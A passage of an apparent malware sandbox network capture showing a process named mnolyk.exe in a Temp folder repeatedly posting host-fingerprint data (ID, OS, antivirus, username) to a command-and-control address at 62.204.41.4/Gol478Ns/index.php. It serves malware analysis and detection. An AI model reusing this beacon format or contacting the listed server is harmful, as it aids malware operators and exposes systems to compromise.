                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      243 | 192.168.2.7 | 49970 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:04.713404894 CET | 696 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:04.776000023 CET | 696 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      244 | 192.168.2.7 | 49971 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:04.988037109 CET | 697 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.052577972 CET | 697 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      245 | 192.168.2.7 | 49972 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:05.232422113 CET | 698 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.295784950 CET | 698 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      246 | 192.168.2.7 | 49973 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:05.465389967 CET | 699 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.528156042 CET | 699 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      247 | 192.168.2.7 | 49974 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:05.733542919 CET | 700 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:05.799844980 CET | 700 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      248 | 192.168.2.7 | 49975 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:05.978492975 CET | 701 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.042375088 CET | 701 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      249 | 192.168.2.7 | 49976 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:06.213926077 CET | 702 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.283323050 CET | 702 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      25 | 192.168.2.7 | 49749 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:03.660430908 CET | 457 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:03.726121902 CET | 457 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      250 | 192.168.2.7 | 49977 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:06.464354992 CET | 703 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.529069901 CET | 703 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      251 | 192.168.2.7 | 49978 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:06.699429989 CET | 704 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:06.766144037 CET | 704 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      252 | 192.168.2.7 | 49979 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:06.951379061 CET | 705 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:07.014616966 CET | 705 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      253 | 192.168.2.7 | 49980 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:07.211466074 CET | 706 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:07.280040979 CET | 706 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      254 | 192.168.2.7 | 49981 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:37:07.544608116 CET | 707 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:07.616162062 CET | 707 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 255, Source IP: 192.168.2.7, Source Port: 49982, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:07.790106058 CET, kBytes transferred: 708, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:07.854876995 CET, kBytes transferred: 708, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 256, Source IP: 192.168.2.7, Source Port: 49983, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:08.027985096 CET, kBytes transferred: 709, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:08.095154047 CET, kBytes transferred: 709, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 257, Source IP: 192.168.2.7, Source Port: 49984, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:08.277098894 CET, kBytes transferred: 710, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:08.341062069 CET, kBytes transferred: 710, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 258, Source IP: 192.168.2.7, Source Port: 49985, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:08.510191917 CET, kBytes transferred: 711, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:08.573493004 CET, kBytes transferred: 711, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 259, Source IP: 192.168.2.7, Source Port: 49986, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:37:08.750838995 CET, kBytes transferred: 712, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Timestamp: Feb 6, 2023 18:37:08.815830946 CET, kBytes transferred: 712, Direction: IN, Data:
                                                                      HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID: 26, Source IP: 192.168.2.7, Source Port: 49750, Destination IP: 62.204.41.4, Destination Port: 80, Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp: Feb 6, 2023 18:36:03.933991909 CET, kBytes transferred: 458, Direction: OUT, Data:
                                                                      POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
